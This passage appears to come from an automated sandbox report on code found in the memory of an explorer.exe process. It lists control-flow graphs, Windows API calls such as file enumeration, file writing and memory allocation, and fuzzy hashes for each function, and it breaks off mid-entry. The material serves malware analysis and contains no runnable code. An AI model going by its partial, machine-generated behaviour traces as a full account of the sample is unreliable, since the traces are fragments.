                                                                                                                                      control_flow_graph 495 30c27a9-30c27c5 496 30c27cf-30c27d3 495->496 497 30c27c7-30c27ca 495->497 499 30c27d5-30c27e1 call 30c329f 496->499 500 30c27e7-30c2806 call 30cadb0 496->500 498 30c2c75-30c2c7b 497->498 499->498 499->500 505 30c2808-30c280e 500->505 506 30c2810-30c2814 500->506 507 30c281c-30c2845 505->507 506->507 508 30c2816 506->508 509 30c2847-30c284e 507->509 510 30c2850-30c2857 507->510 508->507 509->510 511 30c28a5-30c28c7 call 30c3b59 509->511 512 30c287e-30c2895 call 30c250e 510->512 513 30c2859-30c2865 510->513 520 30c28c9-30c28cf 511->520 521 30c28d1 511->521 512->511 523 30c2897 512->523 513->512 515 30c2867-30c287b call 30c2451 513->515 515->512 520->521 524 30c28db-30c2952 call 30cae3b call 30c24f0 * 2 520->524 521->524 525 30c289e-30c28a0 call 30c260f 523->525 526 30c2899-30c289c 523->526 534 30c2958 524->534 535 30c2954-30c2956 524->535 525->511 526->511 526->525 536 30c295a-30c2a23 call 30c24f0 * 11 534->536 535->536 559 30c2a3e-30c2a5d call 30c24f0 * 2 536->559 560 30c2a25-30c2a3c call 30c24f0 * 2 536->560 569 30c2a5f-30c2a65 559->569 560->569 570 30c2a67-30c2a6e 569->570 571 30c2a80-30c2a81 569->571 570->571 572 30c2a70-30c2a7e 570->572 573 30c2a83-30c2a94 call 30c24f0 571->573 572->573 576 30c2ab4 573->576 577 30c2a96-30c2a9b 573->577 579 30c2ab7-30c2abe 576->579 578 30c2a9e-30c2aad 577->578 578->578 580 30c2aaf-30c2ab2 578->580 581 30c2ac7-30c2ac9 579->581 582 30c2ac0 579->582 580->579 583 30c2acf-30c2ae5 call 30c2451 581->583 584 30c2bf1-30c2c3b 581->584 582->581 583->584 591 30c2aeb-30c2af9 583->591 586 30c2c3d-30c2c43 584->586 587 30c2c73 584->587 589 30c2c6c 586->589 590 30c2c45-30c2c57 call 30c4153 586->590 587->498 589->587 595 30c2c5c-30c2c60 590->595 593 30c2aff 591->593 594 30c2afb-30c2afd 591->594 596 30c2b01-30c2b0a call 30c2451 593->596 594->596 595->587 597 30c2c62 595->597 596->584 600 30c2b10-30c2b2a call 30c2451 596->600 597->589 600->584 603 30c2b30-30c2b4a call 30c2451 600->603 603->584 606 30c2b50-30c2b67 call 30c2451 603->606 606->584 609 30c2b6d-30c2b7f call 30c2451 606->609 609->584 612 30c2b81-30c2b93 call 30c2451 609->612 612->584 615 30c2b95-30c2ba7 call 30c2451 612->615 615->584 618 30c2ba9-30c2bbf call 30c2451 615->618 618->584 621 30c2bc1-30c2bd3 call 30c2451 618->621 621->584 624 30c2bd5-30c2bd9 621->624 624->584 625 30c2bdb-30c2be5 call 30c390e 624->625 626 30c2be8-30c2bee 625->626 626->584
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _malloc_strlen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1889909783-0
                                                                                                                                      • Opcode ID: 6e8f00cb2e9fb69e4b55014dac20dec2b877d8e6bbc91019dace5275909309d4
                                                                                                                                      • Instruction ID: df1f9d5018ca08d67f10a7f889c7bd25bf85da38e1ff796052a3db8a50ae3e5e
                                                                                                                                      • Opcode Fuzzy Hash: 6e8f00cb2e9fb69e4b55014dac20dec2b877d8e6bbc91019dace5275909309d4
                                                                                                                                      • Instruction Fuzzy Hash: ADE1B375611741ABDF21DF68C941BEEB7E9BFC4710F148C1DEA9A9BAC0DB70A8418B10
                                                                                                                                      Function 030C268D Relevance: 3.1, APIs: 2, Instructions: 68COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 628 30c268d-30c26b2 call 30d0400 631 30c26b4-30c26bf call 30c3d93 628->631 632 30c26c1-30c26ca 628->632 634 30c26cc-30c26e1 call 30c3ae0 631->634 632->634 638 30c26e7-30c2732 call 30c23a0 call 30cae3b 634->638 639 30c26e3-30c26e5 634->639 645 30c2748-30c2763 call 30ccd40 call 30c25a2 638->645 646 30c2734-30c2746 638->646 640 30c2765-30c276b 639->640 645->640 646->639
                                                                                                                                      APIs
                                                                                                                                      • _malloc.LIBCMT ref: 030C2728
                                                                                                                                        • Part of subcall function 030CAE3B: __FF_MSGBANNER.LIBCMT ref: 030CAE52
                                                                                                                                        • Part of subcall function 030CAE3B: __NMSG_WRITE.LIBCMT ref: 030CAE59
                                                                                                                                        • Part of subcall function 030CAE3B: RtlAllocateHeap.NTDLL(033D0000,00000000,00000001), ref: 030CAE7E
                                                                                                                                      • _memmove.LIBCMT ref: 030C2754
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap_malloc_memmove
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3795339465-0
                                                                                                                                      • Opcode ID: 90531af6d4d711a65fab11b70f7bd40444ce687cdca4a91a65f1bd7e24fdf871
                                                                                                                                      • Instruction ID: b302aae98a6ad2e978cede6ec1e572a107fb5d44f0cc01ee3c5741fd488cabd4
                                                                                                                                      • Opcode Fuzzy Hash: 90531af6d4d711a65fab11b70f7bd40444ce687cdca4a91a65f1bd7e24fdf871
                                                                                                                                      • Instruction Fuzzy Hash: E7213275D1126D9BCF61DF95CC80ADEB7B8BB58200F4006EEE489B6140DBB456C18FA0
                                                                                                                                      Function 030C3956 Relevance: 3.0, APIs: 2, Instructions: 38COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 652 30c3956-30c397e SetFilePointer 653 30c398d-30c398f 652->653 654 30c3980-30c398a GetLastError 652->654 655 30c399d-30c39a5 653->655 656 30c3991-30c3993 653->656 654->653 656->655 657 30c3995-30c399a 656->657 657->655
                                                                                                                                      APIs
                                                                                                                                      • SetFilePointer.KERNEL32(?,?,?,?), ref: 030C3973
                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?), ref: 030C3980
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2976181284-0
                                                                                                                                      • Opcode ID: 4aa8c2fb9ae5572bae8bdd882d5c17f034f7d2a43e3c8f0ad6d9c76268b55470
                                                                                                                                      • Instruction ID: 8dda4979775298590bb8e814a7c80a43041be84dfab3b2e5c6ab37e840a773dd
                                                                                                                                      • Opcode Fuzzy Hash: 4aa8c2fb9ae5572bae8bdd882d5c17f034f7d2a43e3c8f0ad6d9c76268b55470
                                                                                                                                      • Instruction Fuzzy Hash: 19F0907A612719AB8714DFA9EC8896EFBE8EF89361B10826DFC19C3250D7318D10C690
                                                                                                                                      Function 030C390E Relevance: 3.0, APIs: 2, Instructions: 29fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • WriteFile.KERNEL32(?,?,?,00000000,00000000), ref: 030C3931
                                                                                                                                      • GetLastError.KERNEL32 ref: 030C393B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 442123175-0
                                                                                                                                      • Opcode ID: 3a28400f73176a4ef73f41c9cf24d2bcb2cdddfd89ce904356a4a750257f3d8a
                                                                                                                                      • Instruction ID: fc7cd046bbc8e5a1390f30ff4c3b1752588a3f9a5ca481c7f3e12c9fed10f33b
                                                                                                                                      • Opcode Fuzzy Hash: 3a28400f73176a4ef73f41c9cf24d2bcb2cdddfd89ce904356a4a750257f3d8a
                                                                                                                                      • Instruction Fuzzy Hash: BBF01C36522218EFDB24EF54D845BAEBBE8EF08B11F54849DFC41D2140D775D920DB91
                                                                                                                                      Function 030C1185 Relevance: 3.0, APIs: 2, Instructions: 23fileCOMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 030C118F
                                                                                                                                      • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,00040745,030C1E0A), ref: 030C11A1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$MappingOpenView
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3439327939-0
                                                                                                                                      • Opcode ID: faf25a983b09be5259fbe95d90fbfc50df15e74e9736559a3ba98e076aaaa385
                                                                                                                                      • Instruction ID: cac79ce7134a8898442644871679371d38872f9606d5c8f59509a657a3c3e59d
                                                                                                                                      • Opcode Fuzzy Hash: faf25a983b09be5259fbe95d90fbfc50df15e74e9736559a3ba98e076aaaa385
                                                                                                                                      • Instruction Fuzzy Hash: F2D017327472317BE3346E6A6C0CF87AEDDDF87AE2B054025B809D3040D6648820C2F0
                                                                                                                                      Function 030C1011 Relevance: 3.0, APIs: 2, Instructions: 12memoryCOMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 030C11C4: VirtualQuery.KERNEL32(033D3FE8,030C1019,0000001C,030C1019,00000000,030C1CEB,?,?), ref: 030C11D1
                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,033D3FE8,00000000,030C1CEB,?,?), ref: 030C1020
                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,?,?), ref: 030C1027
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Heap$FreeProcessQueryVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2580854192-0
                                                                                                                                      • Opcode ID: 15febf8e192f3d44d7adad32099306b971c23027ffd1763eca9237094ae9579d
                                                                                                                                      • Instruction ID: b1dfaf737bbfc01caa86c321579bcaa5ab84a652352d2c5bd38e338b0d5da3fc
                                                                                                                                      • Opcode Fuzzy Hash: 15febf8e192f3d44d7adad32099306b971c23027ffd1763eca9237094ae9579d
                                                                                                                                      • Instruction Fuzzy Hash: E6C08C3501726062C96477B93C0CBCE2B888F0A222F040045BC0096086CBA8884082E0
                                                                                                                                      Function 030C1000 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000208,030C1AB2,?,?), ref: 030C1003
                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 030C100A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Heap$AllocateProcess
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1357844191-0
                                                                                                                                      • Opcode ID: 0f1fd9192677981261561424ad6462a5d7bc6d8e6a0433862006948d99ad7b9b
                                                                                                                                      • Instruction ID: acaceca205b77acb706823d68aebf5dcf152344d01398018253f779e0a9d1a9d
                                                                                                                                      • Opcode Fuzzy Hash: 0f1fd9192677981261561424ad6462a5d7bc6d8e6a0433862006948d99ad7b9b
                                                                                                                                      • Instruction Fuzzy Hash: 8DA012744031006BED0037E89C0DA053768B781302F0000007D01810489B7810108720
                                                                                                                                      Function 030C2EC5 Relevance: 1.8, APIs: 1, Instructions: 327COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: a1d6af184ef74ec9f9ca0bfafc0a46b455d5dfee8d381fa6f9ab63f968e1cb24
                                                                                                                                      • Instruction ID: 4d07a59e5fcd0de73b1b55f0d7e2fc696c1cc4047840a0af94b4b634169ab415
                                                                                                                                      • Opcode Fuzzy Hash: a1d6af184ef74ec9f9ca0bfafc0a46b455d5dfee8d381fa6f9ab63f968e1cb24
                                                                                                                                      • Instruction Fuzzy Hash: A8C11639721742BBDB68DB78C840BFCF3A9BB44310F14866DE969976C0DB74A891C780
                                                                                                                                      Function 030C12B2 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RtlZeroMemory.NTDLL(?,00000018), ref: 030C12C4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MemoryZero
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 816449071-0
                                                                                                                                      • Opcode ID: e8dba5697146ab89f0d1af918dbaf72b2c80743de980c5a0a0cc7a99a276b3dd
                                                                                                                                      • Instruction ID: e3fc181945b690ee07f859d039ba41d88b63d02ad51f73e6fa47f4aa7df437c8
                                                                                                                                      • Opcode Fuzzy Hash: e8dba5697146ab89f0d1af918dbaf72b2c80743de980c5a0a0cc7a99a276b3dd
                                                                                                                                      • Instruction Fuzzy Hash: 931106B5A02209AFDB14DFA9E884ABEBBFCFB09355F144029FD55E3240D7349911CB60
                                                                                                                                      Function 030C2451 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2102423945-0
                                                                                                                                      • Opcode ID: 7de9f648921173826f1cec72498fc538409b94be3370991270c2076eec18a3bb
                                                                                                                                      • Instruction ID: a3b6902937c36583a4d903aae879b7b8b058a29b231e4966d2f2fc8ca4b62e8e
                                                                                                                                      • Opcode Fuzzy Hash: 7de9f648921173826f1cec72498fc538409b94be3370991270c2076eec18a3bb
                                                                                                                                      • Instruction Fuzzy Hash: EFF0D173A12218ABCF04CF98EC409EEB7ADEF84B00F188529BC08D7605D230CA0086E0
                                                                                                                                      Function 030C1A6A Relevance: 1.5, APIs: 1, Instructions: 15threadCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RtlExitUserThread.NTDLL(00000000), ref: 030C1A8F
                                                                                                                                        • Part of subcall function 030C18E0: lstrcatW.KERNEL32(00000208,00000000,00000000,00000000,?,00000000), ref: 030C192C
                                                                                                                                        • Part of subcall function 030C18E0: PathCombineW.SHLWAPI(00000000,00000000,*.*,?,00000000), ref: 030C193C
                                                                                                                                        • Part of subcall function 030C18E0: FindFirstFileExW.KERNEL32(00000000,00000001,?,00000000,00000000,00000002,?,00000000), ref: 030C195E
                                                                                                                                        • Part of subcall function 030C18E0: lstrcmpiW.KERNEL32(?,?,00000000), ref: 030C1995
                                                                                                                                        • Part of subcall function 030C18E0: PathCombineW.SHLWAPI(00000410,00000208,?,?,?,00000000), ref: 030C19BC
                                                                                                                                        • Part of subcall function 030C18E0: FindNextFileW.KERNEL32(00000000,?,?,00000000), ref: 030C1A42
                                                                                                                                        • Part of subcall function 030C18E0: FindClose.KERNEL32(00000000,?,00000000), ref: 030C1A51
                                                                                                                                        • Part of subcall function 030C1011: GetProcessHeap.KERNEL32(00000000,033D3FE8,00000000,030C1CEB,?,?), ref: 030C1020
                                                                                                                                        • Part of subcall function 030C1011: RtlFreeHeap.NTDLL(00000000,?,?), ref: 030C1027
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Find$CombineFileHeapPath$CloseExitFirstFreeNextProcessThreadUserlstrcatlstrcmpi
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3936785612-0
                                                                                                                                      • Opcode ID: 3707bbb394a5e9ed30ed5f01371028b94571a23e00b6600177c7c625865b29d3
                                                                                                                                      • Instruction ID: 0d61fd1a18487a789475a247336096568df637d0acc6f283e5249277fa034ab3
                                                                                                                                      • Opcode Fuzzy Hash: 3707bbb394a5e9ed30ed5f01371028b94571a23e00b6600177c7c625865b29d3
                                                                                                                                      • Instruction Fuzzy Hash: 4ED09E346276A0A7D66DFF608454B5DB6956F81B41F28040CD8415B1D7CB785881D7D2
                                                                                                                                      Function 030C7604 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _malloc.LIBCMT ref: 030C760F
                                                                                                                                        • Part of subcall function 030CAE3B: __FF_MSGBANNER.LIBCMT ref: 030CAE52
                                                                                                                                        • Part of subcall function 030CAE3B: __NMSG_WRITE.LIBCMT ref: 030CAE59
                                                                                                                                        • Part of subcall function 030CAE3B: RtlAllocateHeap.NTDLL(033D0000,00000000,00000001), ref: 030CAE7E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap_malloc
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 501242067-0
                                                                                                                                      • Opcode ID: e20d54ee6197d9d2cb2e554cdfead7c5880c7c9c178de9ddcfaf8dd6dd425294
                                                                                                                                      • Instruction ID: d54393dc21caa0530709e4c2b6def5aa6b53d1ea14421adab46d914bda2297ad
                                                                                                                                      • Opcode Fuzzy Hash: e20d54ee6197d9d2cb2e554cdfead7c5880c7c9c178de9ddcfaf8dd6dd425294
                                                                                                                                      • Instruction Fuzzy Hash: 2FB0927351934E9B8B04EF98E982D9FB3DCAAA4A20B00840AB9148F150D931F52186A4
                                                                                                                                      Function 030C7619 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _free.LIBCMT ref: 030C761F
                                                                                                                                        • Part of subcall function 030C88FA: RtlFreeHeap.NTDLL(00000000,00000000,?,030C7CD5,00000000,00010108,0000000B,?,00000000,033D3FE8), ref: 030C890E
                                                                                                                                        • Part of subcall function 030C88FA: GetLastError.KERNEL32(00000000,?,030C7CD5,00000000,00010108,0000000B,?,00000000,033D3FE8), ref: 030C8920
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorFreeHeapLast_free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1353095263-0
                                                                                                                                      • Opcode ID: e87896d8f0a4d43bff06e3d27394eb76854e5ac7954b8ea5baf234a6fb4bbc63
                                                                                                                                      • Instruction ID: 077aebc5735b05bcc0dbde2f8652a9c816f4ee0620127be9442f96ef1a810b09
                                                                                                                                      • Opcode Fuzzy Hash: e87896d8f0a4d43bff06e3d27394eb76854e5ac7954b8ea5baf234a6fb4bbc63
                                                                                                                                      • Instruction Fuzzy Hash: 39A0123200830CA74600B689B801849774CBA50130610C036E508084109D276424515C
                                                                                                                                      Function 030C2313 Relevance: 1.3, APIs: 1, Instructions: 38stringCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • lstrlenW.KERNEL32(033D3FE8,?,?,00000000,033D3FE8,00000104), ref: 030C2346
                                                                                                                                        • Part of subcall function 030C2240: FindFirstFileW.KERNEL32(?,?,030DBA98,?,00000000,033D3FE8), ref: 030C2278
                                                                                                                                        • Part of subcall function 030C2240: FindNextFileW.KERNEL32(00000000,?), ref: 030C22F9
                                                                                                                                        • Part of subcall function 030C2240: FindClose.KERNEL32(00000000), ref: 030C2304
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Find$File$CloseFirstNextlstrlen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1108763488-0
                                                                                                                                      • Opcode ID: 457cf859ba799f89b51fb9a111840b714a3ef4ae323abb6c48179e62f234b003
                                                                                                                                      • Instruction ID: b4835d09ab71a0ef8a7d72556e70951421a2bd91692c60ba23e1e71a13da108a
                                                                                                                                      • Opcode Fuzzy Hash: 457cf859ba799f89b51fb9a111840b714a3ef4ae323abb6c48179e62f234b003
                                                                                                                                      • Instruction Fuzzy Hash: D9F0B436B223582BCB04B7689C459EEB2EC9BC8511F00056DAA01AA640DE649D1442A0
                                                                                                                                      Function 030C39A8 Relevance: 1.3, APIs: 1, Instructions: 35COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 030C3956: SetFilePointer.KERNEL32(?,?,?,?), ref: 030C3973
                                                                                                                                        • Part of subcall function 030C3956: GetLastError.KERNEL32(?,?,?,?), ref: 030C3980
                                                                                                                                      • GetLastError.KERNEL32 ref: 030C39DD
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast$FilePointer
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1156039329-0
                                                                                                                                      • Opcode ID: 2bca29f77effa4d093f5559fe3cfecfc40cbeb38c290751106743d6d13e63167
                                                                                                                                      • Instruction ID: 907224474aec3560f838fdc8b4843671cd0ef2babbdf9b7206d1054b0cfb3ef0
                                                                                                                                      • Opcode Fuzzy Hash: 2bca29f77effa4d093f5559fe3cfecfc40cbeb38c290751106743d6d13e63167
                                                                                                                                      • Instruction Fuzzy Hash: 24F0BB3AA22248ABDB40DB9DC8019DEFBB9EF49620F14C399FC10A7244E7716D9087D0
                                                                                                                                      Function 030C104C Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00003000), ref: 030C1056
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                      • Opcode ID: 37d3749fd8f957914923e944d537d95a79c4797b28ff1ff09ffd7802f5fa3ad5
                                                                                                                                      • Instruction ID: c771a085cf374e2cdab8897d7e1173b1268ab34dbf0de00eb3d06f194cd03018
                                                                                                                                      • Opcode Fuzzy Hash: 37d3749fd8f957914923e944d537d95a79c4797b28ff1ff09ffd7802f5fa3ad5
                                                                                                                                      • Instruction Fuzzy Hash: FFA002B07D73007AFD696791AD1FF152E689B41F42F100184BB0DBC0C456E87554856D
                                                                                                                                      Function 030C105D Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 030C1065
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1263568516-0
                                                                                                                                      • Opcode ID: deec34f9970177696f05e9b42e2e393424aa8999fc55f978d383a4bebea132b0
                                                                                                                                      • Instruction ID: 4e357a25ec1a2ce396ffe223cc0f0b3f287a407de32dd689449ea2d8a2e6eb35
                                                                                                                                      • Opcode Fuzzy Hash: deec34f9970177696f05e9b42e2e393424aa8999fc55f978d383a4bebea132b0
                                                                                                                                      • Instruction Fuzzy Hash: 00A0027469270066FD7467245D1AF0926546B42B05F2085447A41681C44AA9A0148A18

                                                                                                                                      Non-executed Functions

                                                                                                                                      Function 030C20C1 Relevance: 6.0, APIs: 4, Instructions: 31timefileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 030C20D6
                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?,?,?), ref: 030C20EE
                                                                                                                                      • FileTimeToDosDateTime.KERNEL32(?,?), ref: 030C20FD
                                                                                                                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 030C2104
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileTime$Find$CloseDateFirstLocal
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2659516521-0
                                                                                                                                      • Opcode ID: 89353ef2ca0f44d8b13409a5d6bd033f117f36f36388c67427a03aeb42604284
                                                                                                                                      • Instruction ID: a41d5366e8da006c71fbf632ecc10065370b6f32fbe88fb14ca93ec10d7a8706
                                                                                                                                      • Opcode Fuzzy Hash: 89353ef2ca0f44d8b13409a5d6bd033f117f36f36388c67427a03aeb42604284
                                                                                                                                      • Instruction Fuzzy Hash: 28F0A277402118ABD710B6A8EC4DDDF7BFCDB8A221F040666BE19D2144EB7495558BA0
                                                                                                                                      Function 030C8DF5 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,00000000,030C9222,-00000328,?,?,00000001), ref: 030C8DFA
                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 030C8E03
                                                                                                                                      Memory Dump Source
